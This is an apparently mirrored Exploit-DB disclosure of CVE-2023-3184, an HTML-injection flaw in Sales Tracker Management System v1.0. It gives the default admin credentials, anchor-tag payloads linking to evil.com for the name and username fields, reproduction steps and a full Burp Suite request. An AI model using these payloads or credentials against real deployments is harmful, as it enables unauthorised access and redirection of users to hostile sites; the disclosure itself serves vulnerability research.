1

[webapps] Sales Tracker Management System v1.0 - Multiple Vulnerabilities

 1 year ago
source link: https://www.exploit-db.com/exploits/51513
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

Sales Tracker Management System v1.0 - Multiple Vulnerabilities

EDB-ID:

51513

EDB Verified:

Exploit:

  /  

Platform:

PHP

Date:

2023-06-13

Vulnerable App:

Exploit Title: Sales Tracker Management System v1.0 – Multiple Vulnerabilities 
Google Dork: NA
Date: 09-06-2023
EXPLOIT-AUTHOR: AFFAN AHMED
Vendor Homepage: <https://www.sourcecodester.com/>
Software Link: <https://www.sourcecodester.com/download-code?nid=16061&title=Sales+Tracker+Management+System+using+PHP+Free+Source+Code>
Version: 1.0
Tested on: Windows 11 + XAMPP
CVE : CVE-2023-3184

==============================
CREDENTIAL TO USE
==============================
ADMIN-ACCOUNT
USERNAME: admin
PASSWORD: admin123

=============================
PAYLOAD_USED
=============================
1. <a href=//evil.com>CLICK_HERE_FOR_FIRSTNAME</a>
2. <a href=//evil.com>CLICK_HERE_FOR_MIDDLENAME</a>
3. <a href=//evil.com>CLICK_HERE_FOR_LASTNAME</a>
4. <a href=//evil.com>CLICK_HERE_FOR_USERNAME</a>


===============================
STEPS_TO_REPRODUCE
===============================
1. FIRST LOGIN INTO YOUR ACCOUNT BY USING THE GIVEN  CREDENTIALS OF ADMIN 
2. THEN NAVIGATE TO USER_LIST AND CLCIK ON `CREATE NEW` BUTTON OR VISIT TO THIS URL:`http://localhost/php-sts/admin/?page=user/manage_user` 
3. THEN FILL UP THE DETAILS AND PUT THE ABOVE PAYLOAD IN `firstname` `middlename`  `lastname` and in `username` 
4. AFTER ENTERING THE PAYLOAD CLICK ON SAVE BUTTON
5. AFTER SAVING THE FORM YOU WILL BE REDIRECTED TO ADMIN SITE WHERE YOU CAN SEE THAT NEW USER  IS ADDED  .
6. AFTER CLICKING ON THE  EACH PAYLOAD IT REDIRECT ME TO EVIL SITE



==========================================
BURPSUITE_REQUEST
==========================================
POST /php-sts/classes/Users.php?f=save HTTP/1.1
Host: localhost
Content-Length: 1037
sec-ch-ua: 
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7hwjNQW3mptDFOwo
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
sec-ch-ua-platform: ""
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/php-sts/admin/?page=user/manage_user
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=r0ejggs25qnlkf9funj44b1pbn
Connection: close

------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="id"


------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="firstname"

<a href=//evil.com>CLICK_HERE_FOR_FIRSTNAME</a>
------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="middlename"

<a href=//evil.com>CLICK_HERE_FOR_MIDDLENAME</a>
------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="lastname"

<a href=//evil.com>CLICK_HERE_FOR_LASTNAME</a>
------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="username"

<a href=//evil.com>CLICK_HERE_FOR_USERNAME</a>
------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="password"

1234
------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="type"

2
------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundary7hwjNQW3mptDFOwo--

===============================
PROOF_OF_CONCEPT
===============================
GITHUB_LINK: https://github.com/ctflearner/Vulnerability/blob/main/Sales_Tracker_Management_System/stms.md

report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK